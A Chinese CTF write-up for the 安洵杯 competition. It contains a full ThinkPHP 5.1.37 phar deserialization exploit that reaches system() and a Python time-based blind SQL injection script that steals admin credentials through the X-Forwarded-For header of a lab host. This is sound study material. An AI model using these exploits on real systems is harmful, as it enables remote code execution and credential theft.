
安洵杯

EZ_TP

  • thinkphp 5.1.37 反序列化
  • phar 触发反序列化

扫描目录得到 www.zip 备份文件,通过报错信息得到 thinkphp 版本,查看控制器发现多了一个 hello



通过 world 可以实现变量覆盖,向 hello.txt 任意写入;利用点在 file_get_contents,它通过 phar 伪协议
反序列化 hello.txt 中的内容,所以我们需要生成一个 phar 文件

exp:

<?php
namespace think\process\pipes{
use think\model\Pivot;
// Stand-in for the framework class of the same fully-qualified name. Only the
// class name and the property name/visibility are reproduced, because those
// are what decide how the object is serialized into the phar metadata below;
// none of the framework's own methods are needed to build the payload.
class Windows{
// Visibility must match the framework's declaration: a `private` property is
// serialized with a "\0ClassName\0" prefix, so `protected`/`public` here would
// produce a different, non-matching property name.
private $files = [];
public function __construct(){
// A single Pivot is stored; what the framework does with this array after
// unserialize() is not shown on this page.
$this->files[]=new Pivot();
}
}
}
namespace think{
// Minimal mirror of the framework's abstract Model: it declares only the
// properties whose serialized values the writeup relies on.
abstract class Model{
protected $append;
private $data;
function __construct(){
// `Request` resolves to \think\Request, declared further down in this file;
// that is fine because this constructor only runs when `new Windows()` is
// executed at the bottom of the script, after every class has been declared.
$this->data = ['request'=>new Request()];
// `append['request']` is first set to '' and then overwritten with an array;
// the final serialized value is the array form.
$this->append = ['request' => ''];
$this->append['request'] = array(
'aa' => 'aaa'
);
}
}
}
namespace think\model{
use think\Model;
// NOTE(review): this import is unused in this namespace block.
use think\Request;
// Concrete subclass so that a Model can be instantiated (Model is abstract);
// the serialized class name therefore becomes \think\model\Pivot.
class Pivot extends Model{
}
}
namespace think{
// Mirror of the framework's Request class. `$config` is copied as-is so the
// property layout matches; `$hook`, `$param` and `$filter` are the three
// values the writeup tailors (see the numbered notes in the constructor).
class Request{
protected $hook;
protected $param;
protected $filter;
protected $config = [
// Variable used to spoof the form request method
'var_method' => '_method',
// Variable used to spoof an ajax form request
'var_ajax' => '',
// Variable used to spoof a pjax form request
'var_pjax' => '_pjax',
// PATHINFO variable name, used in compatibility mode
'var_pathinfo' => 's',
// Fallbacks for obtaining PATH_INFO
'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
// Default global filter methods, comma-separated for multiple
'default_filter' => '',
// Domain root, e.g. thinkphp.cn
'url_domain_root' => '',
// HTTPS proxy identifier
'https_agent_name' => '',
// IP proxy header identifier
'http_agent_ip' => 'HTTP_X_REAL_IP',
// URL pseudo-static suffix
'url_html_suffix' => 'html',
];
public function __construct(){
$this->hook = ["visible"=>[$this,"isAjax"]];
$this->param = ['dir']; // 2. modified
// 1. modified. A function name stored in a data property that the framework
// later treats as a filter callback is the core weakness this chain abuses
// (framework code not shown here). Defensive takeaway: filter/callback
// configuration must never be reconstructible from unserialized or otherwise
// untrusted state.
$this->filter = array('1' => 'system','2' => '2');

}
}
}
namespace {
use think\process\pipes\Windows;
//echo base64_encode(serialize(new Windows));
$w = new Windows();

// Building the archive requires phar.readonly=0 in php.ini; with the default
// (On) the write calls below fail.
$p = new Phar('phar.phar');
$p->startBuffering();
$p->setStub('<?php __HALT_COMPILER();?>');
// Store the custom meta-data in the manifest. This is the deserialization
// vector: on PHP < 8.0, opening a phar:// path with any file function
// unserializes the manifest metadata automatically, so a user-controlled path
// reaching file_get_contents() is an unserialize() sink. Mitigations: validate
// that paths carry no stream-wrapper scheme, keep phar.readonly=On, and
// unregister the wrapper (stream_wrapper_unregister('phar')) where phar
// archives are not needed.
$p->setMetadata($w);
$p->addFromString("test", "12345");
$p->stopBuffering();

echo base64_encode(file_get_contents('phar.phar'));
}
?>

parse_str 会把 + 等字符解析成空格,所以 base64 字符串里的 + 需要两次 url 编码

浅谈Phar反序列化漏洞利用:N1CTF 2021 easyphp & 安洵杯2021 EZ_TP

Ezcms

  • 代码审计

web.zip 源码泄露

scshop1.5,之前审过类似的站:SEMCMS php-v3.9 代码审计

仍然存在注入点,为时间盲注

import requests
import time

# Character set tried at each position of the extracted value.
s='abcdefghijklmnopqrstuvwxyz1234567890{}_-[]()!~QWERTYUIOPASDFGHJKLZXCVBNM'

# The CTF lab instance from the writeup.
url='http://47.108.195.119:6244/Core/Program/Ant_Rponse.php?actions=ReviewsAdd&lgid=1&type=Add'

# Ordinary form fields of the review endpoint; kept constant for every probe.
datas={'msg_rating':'4','msg_name':'okami okami','msg_email':'okami@okami.com','msg_content':'1111','msg_pid':'2','msg_flag':'p','languageID':'1'}

# Conditional-delay probe: the only observable is response latency, so a
# correct character guess is inferred from the server-side sleep(3).
payload="1'+(if((ascii(substr((select(user_name)from(sc_user),{}))={}),sleep(3),0))+'1"

#data='0b7752df93de693bdab0060746e38165'
#admin888
#admin888
data=''
for i in range(1,40):
    for a in s:
        payloads=payload.format(str(i),str(ord(a)))
        # The injection travels in X-Forwarded-For, presumably because the
        # application stores the "client IP" from that header into a query
        # without parameterization (server code not on this page). Defensive
        # takeaway: proxy headers are attacker-controlled input and must be
        # bound as parameters like any other field.
        headers={'X-Forwarded-For':payloads}
        print(headers)
        start = int(time.time())
        r=requests.post(url,data=datas,headers=headers)
        response_time = int(time.time()) - start
        # Second-granularity timing; network jitter can produce false positives.
        if response_time >= 3:
            data+=a
            print('data: '+str(data))
            break
        else:
            print(r.text)

得到账号密码,但是后来审计发现没有鉴权,变成了前台 getshell

rssblogv2

ezjson

hint: fd 会有什么呢?

可以读取文件

参考

安洵杯-WriteUp